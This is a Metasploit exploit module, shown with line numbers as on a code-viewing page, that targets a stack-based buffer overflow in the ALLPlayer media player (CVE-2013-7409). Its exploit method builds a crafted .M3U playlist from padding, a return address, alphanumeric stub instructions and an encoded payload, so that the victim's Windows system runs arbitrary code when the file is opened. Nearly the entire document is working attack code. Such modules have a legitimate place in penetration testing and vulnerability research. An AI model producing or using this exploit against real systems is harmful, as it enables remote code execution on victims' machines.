Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::FILEFORMAT
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'ALLPlayer M3U Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack-based buffer overflow vulnerability in
16
        ALLPlayer 5.8.1, caused by a long string in a playlist entry.
17
        By persuading the victim to open a specially-crafted .M3U file, a
18
        remote attacker could execute arbitrary code on the system or cause
19
        the application to crash. This module has been tested successfully on
20
        Windows 7 SP1.
21
      },
22
      'License'        => MSF_LICENSE,
23
      'Author'         =>
24
        [
25
          'metacom',      # Vulnerability discovery
26
          'Mike Czumak',  # Original exploit
27
          'Gabor Seljan'  # Metasploit module
28
        ],
29
      'References'     =>
30
        [
31
          [ 'CVE', '2013-7409' ],
32
          [ 'BID', '62926' ],
33
          [ 'BID', '63896' ],
34
          [ 'EDB', '28855' ],
35
          [ 'EDB', '29549' ],
36
          [ 'EDB', '29798' ],
37
          [ 'EDB', '32041' ],
38
          [ 'OSVDB', '98283' ],
39
          [ 'URL', 'http://www.allplayer.org/' ]
40
        ],
41
      'DefaultOptions' =>
42
        {
43
          'EXITFUNC' => 'thread'
44
        },
45
      'Platform'       => 'win',
46
      'Payload'        =>
47
        {
48
          'DisableNops'    => true,
49
          'BadChars'       => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
50
          'Space'          => 3060,
51
          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
52
          'EncoderOptions' =>
53
            {
54
              'BufferRegister' => 'EAX'
55
            }
56
        },
57
      'Targets'        =>
58
        [
59
          [ ' ALLPlayer 2.8.1 / Windows 7 SP1',
60
            {
61
              'Offset' => 301,
62
              'Ret'    => "\x50\x45",  # POP POP RET from ALLPlayer.exe
63
              'Nop'    => "\x6e"       # ADD BYTE PTR DS:[ESI],CH
64
            }
65
          ]
66
        ],
67
      'Privileged'     => false,
68
      'DisclosureDate' => '2013-10-09',
69
      'DefaultTarget'  => 0))
70

71
      register_options(
72
        [
73
          OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
74
        ],
75
      self.class)
76

77
  end
78

79

80
  def exploit
81
    nop = target['Nop']
82

83
    sploit =  rand_text_alpha_upper(target['Offset'])
84
    sploit << "\x61\x50"      # POPAD
85
    sploit << target.ret
86
    sploit << "\x53"          # PUSH EBX
87
    sploit << nop
88
    sploit << "\x58"          # POP EAX
89
    sploit << nop
90
    sploit << "\x05\x14\x11"  # ADD EAX,0x11001400
91
    sploit << nop
92
    sploit << "\x2d\x13\x11"  # SUB EAX,0x11001300
93
    sploit << nop
94
    sploit << "\x50"          # PUSH EAX
95
    sploit << nop
96
    sploit << "\xc3"          # RET
97
    sploit << nop * 109
98
    sploit << payload.encoded
99
    sploit << rand_text_alpha_upper(10000) # Generate exception
100

101
    # Create the file
102
    print_status("Creating '#{datastore['FILENAME']}' file ...")
103
    file_create("http://" + sploit)
104

105
  end
106
end
107

108

109